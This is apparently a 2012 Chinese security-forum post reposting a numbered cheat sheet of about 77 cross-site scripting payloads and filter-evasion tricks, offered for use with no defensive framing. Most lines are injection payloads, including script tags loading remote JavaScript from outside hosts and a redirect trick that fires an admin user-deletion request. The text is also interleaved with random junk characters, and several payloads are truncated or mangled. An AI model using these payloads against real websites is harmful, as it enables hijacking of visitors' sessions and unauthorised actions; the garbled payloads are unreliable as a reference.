貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
* c. w1 }% G) J1 d( @# j- a( Y0 X- _# u1 E, L1 R
(1)普通的XSS JavaScript注入
- J& m; i) M" t, g6 F" S' O <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 R0 B( N, N8 p1 i' P* f
4 I( w' |6 A! y5 K2 i (2)IMG标签XSS使用JavaScript命令4 {& B3 c3 I0 |: l
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 U4 J0 F l: k! u8 ^! ?) _0 o* r O: N5 Q
(3)IMG标签无分号无引号
: x5 u9 I" {- q4 I1 F0 U <IMG SRC=javascript:alert(‘XSS’)>, O9 `; u& C8 X
( B% n, H5 \, y, q1 @1 _& {; g! X
(4)IMG标签大小写不敏感
" l( P# g" a8 A& v x6 D <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
. v) x$ A5 g: N4 j
; ~& f+ H4 h L# v (5)HTML编码(必须有分号)
3 j: @& l! J7 O2 B8 t) t E! C <IMG SRC=javascript:alert(“XSS”)>
7 q* ^% h+ ]0 V8 \ x# @$ S. L) L$ x' q4 |6 y( V! K, k. c4 i
(6)修正缺陷IMG标签. ^. ^0 |: L4 p/ |
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>) ?' w# u$ Q/ n+ ^ a# L. }
( j; ~4 f6 Y* @8 E (7)formCharCode标签(计算器)
0 g( t& R W/ J! m$ t/ T <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ i4 e& `2 Y' V- J
* g( [, r* A9 I; B (8)UTF-8的Unicode编码(计算器)
2 p- {6 w3 a/ o3 {1 i+ v+ u: | <IMG SRC=jav..省略..S')>
^. f8 o) d* k4 g* L# P4 M
! ?6 h4 M, a \' d# Y (9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 j6 ~. a! ?0 I1 D% A- Q
<IMG SRC=jav..省略..S')>& g0 j5 J T( K+ L+ V/ P; T
/ ?4 Y! t, @2 z
(10)十六进制编码也是没有分号(计算器)
0 e. ?4 J3 S2 O [7 f/ K# l <IMG SRC=java..省略..XSS')>( U$ t' W4 @- M: @9 V
0 H: p% a) C( h* k (11)嵌入式标签,将Javascript分开
2 ?$ ? \; e3 \9 Q* k9 n' N5 s, _& k <IMG SRC=”jav ascript:alert(‘XSS’);”> {! _& r/ h2 \/ B
3 K/ n7 q, U' [( C6 N l- X (12)嵌入式编码标签,将Javascript分开) g# J4 G$ o. w. j8 r: F2 |. ^; t
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 L8 q2 s1 z. B ]
$ N5 s; y. B/ \' |' L
(13)嵌入式换行符
# \2 c& r3 J4 g <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 o+ P' m5 ~# B* ^
6 b% ~: u3 F$ \: \6 q( C (14)嵌入式回车5 M. M- w, W5 C; ]3 K: X8 X8 E/ _/ L
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, Y) v' l* J4 k4 [7 _5 ]
/ v0 O; W5 T7 S$ w" p (15)嵌入式多行注入JavaScript,这是XSS极端的例子 R! o, H. i6 e
<IMG SRC=”javascript:alert(‘XSS‘)”>4 b9 B# @3 `4 Z! P4 ~0 h g6 H6 T5 [
& b7 N( y% `0 V( K; q/ l% ^4 e
(16)解决限制字符(要求同页面)9 e' a1 X& Q8 H/ N. N0 i
<script>z=’document.’</script>
9 X1 G8 E3 O4 ~) c [* M1 Z <script>z=z+’write(“‘</script>" u* C3 g5 ]6 g3 P" H9 K w- T7 \
<script>z=z+’<script’</script>3 e$ |" T* U4 e, E% m! |- V. o
<script>z=z+’ src=ht’</script>4 ~7 C; u8 e3 j$ U) w( U- R
<script>z=z+’tp://ww’</script>8 g4 [7 l+ \+ O4 } d* I/ i, X
<script>z=z+’w.shell’</script>
; r: v3 L( j: l0 _8 _! Q$ h& z1 M <script>z=z+’.net/1.’</script>7 V l! M$ Q: T) t8 B
<script>z=z+’js></sc’</script>
3 x% J$ z' l4 x' b; z6 P <script>z=z+’ript>”)’</script>- Q- x( j# ~* I/ T; C# S
<script>eval_r(z)</script>
9 Z1 @8 |/ i) K6 z6 |. W9 @6 k. ?+ ~/ ~2 S4 `; e
(17)空字符* p2 y, E; e" {8 ~4 {
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ ^9 ~. m6 Y7 h: ~: l& r* i( w2 o" j1 z( J' u" E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. @. O8 e1 ^2 s, o. B perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ q8 j* Y, V# U5 R2 C
- c& d# {6 ?0 d7 i# g4 H0 x
(19)Spaces和meta前的IMG标签
" T7 J: ?# Y$ L3 z$ Y- S1 N <IMG SRC=” � javascript:alert(‘XSS’);”>
; u! y# E5 {$ P( F+ L, G4 u
) Y6 L. `4 U* a; D& i0 D (20)Non-alpha-non-digit XSS3 n* z# m) J5 |3 g8 N
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" T9 J8 e6 ^6 T# i/ d. E
% @& r0 H2 Q+ |! ?0 a8 H/ A' u* b+ |
(21)Non-alpha-non-digit XSS to 2: z/ M( v# @' ]
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
6 Y: Y% H g& Y2 A- `
3 ^. e$ j+ P6 g, S5 c9 l (22)Non-alpha-non-digit XSS to 3' j F+ `! G: Z' S. m- t' s
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, C4 T5 g8 L: E' k: T4 i
# ?; F5 d/ v$ } (23)双开括号
( m E) D" i8 s" T7 Q <<SCRIPT>alert(“XSS”);//<</SCRIPT>9 b% H9 _3 W3 T5 M. s( \
0 Q+ B) b9 c2 F/ l0 O/ a
(24)无结束脚本标记(仅火狐等浏览器)
" b4 e1 a, w* k4 D3 N( K2 K! V <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
7 I) e7 h; J' T1 O7 ^% k( {1 h6 @, w4 F- @# u: T( J
(25)无结束脚本标记2
3 K' W6 ^* w( A9 M <SCRIPT SRC=//3w.org/XSS/xss.js>
- N7 Q! q& g, K9 F1 _
# Z, H% Z; z O2 F (26)半开的HTML/JavaScript XSS" M+ M* ]4 h! K% v" b
<IMG SRC=”javascript:alert(‘XSS’)”
( ^: W+ j! F! z) ]' A9 p% i/ ]
}6 j0 ]9 O' f: W* o8 E# g0 Y' F8 ` (27)双开角括号/ C' t8 u5 M) b% r' q
<iframe src=http://3w.org/XSS.html <
. }. ^" m. a: e8 W" b
7 n' L# ^* R3 `) y) y7 S& C% O' e( L (28)无单引号 双引号 分号 S/ O. M( Z" {# d- f( v) G5 q2 C
<SCRIPT>a=/XSS/) I& [+ M1 p% p/ p) P; f, Q
alert(a.source)</SCRIPT>
+ s9 ~- }; y, @6 `) P( E- n/ x, Z4 Q
(29)换码过滤的JavaScript
9 [8 d5 ^3 E' @6 y- T4 y k$ c \”;alert(‘XSS’);//% T* ~( a. A% q: ` s3 Z3 f: T% a
0 s, J6 W" M4 c% I" } (30)结束Title标签: c+ j( e; d: p% _( L
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 n* ]+ b, i) ?% e
3 A- {" S0 }$ z. b3 `4 V (31)Input Image
% f$ g! |/ T3 r" e3 h <INPUT SRC=”javascript:alert(‘XSS’);”>
Y) d4 K" s- U( i' A5 c! p
8 h P- S2 v% C1 S (32)BODY Image7 d$ w7 ~/ w; Z d9 {4 C! d
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 l" |# x" ]: u8 g i& Z4 m2 ^( E! W/ ]
(33)BODY标签
5 Z* V: s0 w5 E3 [; Z' H8 d% \5 s <BODY(‘XSS’)>/ V" b9 J% Q! Q) s5 D- E
% H& l9 F, B# {2 F+ O
(34)IMG Dynsrc
/ h3 y5 g! F) H5 y/ ?) Y: F \ <IMG DYNSRC=”javascript:alert(‘XSS’)”>
, |( {7 Y. k( x3 X6 o# Y4 L& r1 K- g! \% ]# m9 z0 I) m
(35)IMG Lowsrc
$ A2 T4 e* U+ H <IMG LOWSRC=”javascript:alert(‘XSS’)”>( t X) {2 K G& V) T( K
0 s s2 J% t# R" j& s3 u
(36)BGSOUND9 Q1 [5 v5 a1 y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
- k% v! c! I ^8 n7 y- Y& j: C6 U h6 [$ d0 C* @+ O a
(37)STYLE sheet0 U$ x+ W8 h7 u; y3 B
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
; ?; g/ v( |0 M) @: }+ }
4 a- w2 q& X5 @: C- D9 t) Z (38)远程样式表
2 D- ~2 h# A3 C6 S, @ <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ B+ W$ ~/ J' O2 t* | }( i$ E
- W" S4 H* Y0 |/ Q! I. b$ R, m (39)List-style-image(列表式)0 y' H2 o2 \( N6 w# n$ b. P
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS. R5 X, J1 I; s# X
9 r% F! m% u* X: j. \ (40)IMG VBscript
* _9 r) C6 O0 B6 m. [8 Z% q <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
7 t J0 N. {3 ^- `1 @
, Y5 Q2 f4 m. S3 M. C d (41)META链接url5 c+ c$ m3 P+ ~; D! u L- c) C
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
* n- J% J8 j4 m6 b/ j Q% p2 S8 t
(42)Iframe
& V2 t) C; B( g5 G4 I% c/ _ <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
+ h$ J* `; ^' p+ E4 H) b4 u
! A: @$ ?9 r3 Q- @9 [3 e (43)Frame# O% @, h1 }2 L6 E
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
9 K! N" w$ H( O+ A* T" B; t% P( L: q# {
(44)Table: h* W) ]& ^5 H4 r4 _
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>+ p/ A, F" I% [: D- \5 x% z
* Z; [3 D4 L' `, ]1 T/ D (45)TD
: K. `/ P# _" f7 @" ]) |8 h+ o2 M <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>; c% n r; y0 j9 _5 g/ H7 A# e
3 Q2 |2 c/ Y) {8 e (46)DIV background-image
2 q. `+ {/ ]9 j/ Q$ K- [- V <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 P/ v% c X- U( i/ B
0 C/ J- u4 o- g2 {( ~
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ S7 x! {5 M2 ^3 C8 [+ c& X4 h <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
, k: D0 f; R: Z; S0 \) ]& B
" i: _ C6 I* I# \9 f (48)DIV expression! o E+ x% i4 Y# e) ^& u
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>2 V0 f; q, L$ L6 u
9 O# y! M+ @7 h, R (49)STYLE属性分拆表达0 J6 W# N9 [% P+ X* \5 m6 Q
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% ]. _3 a" W: T1 ] y& O `
( I; z5 G) q, ~7 B+ C f9 B+ n (50)匿名STYLE(组成:开角号和一个字母开头); W2 V6 |! N* J0 ?1 }9 M5 T! ?
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 ~. V) C6 t+ N3 W0 c2 m0 n
/ m4 C7 n5 [3 y& G
(51)STYLE background-image
; {9 L+ m4 l W5 x2 D <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
( M6 b/ _& j2 ?' c9 w6 l7 n3 ^3 U% K. j1 J D3 j& z
(52)IMG STYLE方式" R4 ?4 _. _! h/ p& g/ S) @6 @- j# y6 T
exppression(alert(“XSS”))’>
x" {% F( C$ ]
) z8 l- Q. s: y# Z4 Z% L( ? (53)STYLE background
: E# g# M4 @( U, t! H1 X @! X <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
8 y% B1 n) r" ?: e0 C. b( x
/ e2 J& S n' [* B* Z (54)BASE
8 Q3 F1 R; F* k1 k y <BASE HREF=”javascript:alert(‘XSS’);//”>
7 ?) h% t& y) L* E2 N" i, Q6 {+ f. ]( u* `5 V5 d2 L
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 W) v9 X: u$ D& r4 V6 P5 s <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* E. K' G( Y5 j4 e
/ B4 P% W I$ G) n; D3 e3 s6 Y (56)在flash中使用ActionScrpt可以混进你XSS的代码, p) c2 f6 C+ U T- y
a=”get”;2 {' s3 T9 ~# e
b=”URL(\”";" x# v2 E* ]4 p j& G5 r
c=”javascript:”;9 l4 p& B B$ T2 D3 L
d=”alert(‘XSS’);\”)”; o; X$ i$ I( I8 }) c
eval_r(a+b+c+d);
. G7 P5 F) [, @2 x. Z. W# A- c2 @, s. `4 I9 H( B% v. W
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! D W' F3 K' H6 P& g$ Y <HTML xmlns:xss>. C7 t6 R3 M' e: t/ q% X8 \
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
5 w+ R$ W, h) a% g <xss:xss>XSS</xss:xss>
# H: b3 s/ {* N </HTML>/ o/ f( }' e$ n# S* F5 X7 Y
3 p5 N. R9 f2 R. w (58)如果过滤了你的JS你可以在图片里添加JS代码来利用; P# L/ i' ~' o+ q5 K$ F4 L
<SCRIPT SRC=””></SCRIPT>
' k! i; {! G+ c. P1 U9 V2 ?( w$ p6 y1 ?) T* {* `9 i* @: w
(59)IMG嵌入式命令,可执行任意命令
, [. x/ _$ ? u r3 P <IMG SRC=”http://www.XXX.com/a.php?a=b”>7 b) g. |# n* q1 h5 l
* h/ _; p6 o, C s6 g& _+ e3 H! w
(60)IMG嵌入式命令(a.jpg在同服务器)7 M. s$ `( F( d$ d% i2 |
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
O6 c4 |! U% x d) S5 W) \
9 [( ^! `4 Z9 q/ n d, \6 N/ Q (61)绕符号过滤+ A+ g. v3 H- E9 p2 l
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 c+ r1 a" E+ y, y2 j) k
N- L2 g Z- G8 c
(62)
7 Z5 p. ?, f# ]' \6 {+ Z6 i2 o& R <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 a( n4 ?& r, `5 t4 H
7 p6 @+ e. [9 V1 F (63)0 o+ j: C: F; `! f% i* ~
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
/ @3 t5 c$ n" v8 y' {6 @7 K. \9 p' d) Y+ z% L
(64)
! K/ ~, b& |3 i6 n- ]; k% r3 ? <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>/ |8 P8 F2 l' T2 H" i
7 _- F5 a ]0 H9 X' i
(65)3 H o8 k5 i4 s+ E R" Y" X \: C
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 M' x3 k: k) @& ^7 @
; J0 o S7 A K9 c" ? (66)
4 X6 ]% ]4 d, G( j& {1 h- A! [ <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( w1 J" B* |8 ~! }2 x0 |! e2 ^( f
/ \3 D. u) D7 D9 A
(67)) T! k3 b' n+ N$ |7 Z
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
+ h5 |% ~2 ]/ @, K: Q" O, x
7 C( k9 r n9 o4 |& D (68)URL绕行
" X8 P9 J/ q! [/ q/ M7 U$ [ <A HREF=”http://127.0.0.1/”>XSS</A>, u$ Z, d1 Z( m+ u3 u
7 q/ y2 K. n2 I C' D# d) q! S5 O( j
(69)URL编码0 M- F' |4 p4 C% J; E0 r
<A HREF=”http://3w.org”>XSS</A>' z! u) X" q$ _6 ~ H' ~/ [
0 v; c* w! g0 r& `
(70)IP十进制
* w- q* o+ c1 ~+ e+ C. v, s* i <A HREF=”http://3232235521″>XSS</A>, J: \, f" _3 i. c9 S9 Y
q$ n9 G2 \" W/ ?( ?
(71)IP十六进制
' x7 Q3 A3 p# v5 i; U. M# X6 o$ W <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 d5 ^4 I4 N9 K# I) `+ L% {1 S ?4 ^6 y0 b: s2 z
(72)IP八进制
' `1 l2 A* G' R <A HREF=”http://0300.0250.0000.0001″>XSS</A>, F5 }! E/ O( k0 v+ ~8 |' `
& ?0 x9 S( ~. d& x7 G; T2 A0 p7 R
(73)混合编码2 d: c3 Z' [4 E2 S% I8 b) y4 e
<A HREF=”h
5 H" c! H4 Z: {1 k7 [' E! h" q! R: r tt p://6 6.000146.0×7.147/”">XSS</A>
9 }, f# t2 ^. O/ z! g- n' u, c4 P3 }9 e$ f
(74)节省[http:]
# g5 }1 t5 F( C a <A HREF=”//www.google.com/”>XSS</A>
! q: V8 [+ \5 }' I9 a" _ B7 K
2 E/ o4 w7 `2 }3 q (75)节省[www]) |) Z0 t: m( S* \2 G0 T3 d! D3 w
<A HREF=”http://google.com/”>XSS</A>
* j' q2 x- R& I; B% r# }
, J* B$ s# n$ u: J8 H+ d! B (76)绝对点绝对DNS
+ [. j8 U8 ]3 [ Z0 h9 o <A HREF=”http://www.google.com./”>XSS</A>- ]3 J5 ^# o7 Y" I a2 u
4 c5 ~( K0 S4 q" y. ~' a (77)javascript链接
3 f+ Z( P8 d" N y8 X1 M& w0 o <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对